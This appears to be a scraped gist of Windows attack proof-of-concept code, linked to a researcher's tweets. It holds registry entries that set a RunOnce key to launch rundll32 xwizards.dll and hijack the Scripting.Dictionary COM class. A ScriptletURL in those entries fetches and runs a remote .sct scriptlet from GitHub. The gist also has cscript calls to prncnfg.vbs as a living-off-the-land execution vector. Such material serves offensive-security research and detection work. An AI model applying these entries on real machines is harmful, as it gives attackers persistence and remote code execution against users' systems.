https://twitter.com/harr0ey/status/1052405330402074624
https://gist.github.com/homjxi0e/66555fedc78af49635b2e5dfea9dd1ae
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\setup]
@="rundll32 xwizards.dll,RunPropertySheet /u {00000001-0000-0000-0000-0000FEEDACDC}"
"COM Hijacking"=""
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"
|
2 prmcnfg.vbs
1
2
| cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\prncnfg.vbs /?
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prncnfg.vbs /?
|
https://twitter.com/harr0ey/status/1137443710197817344
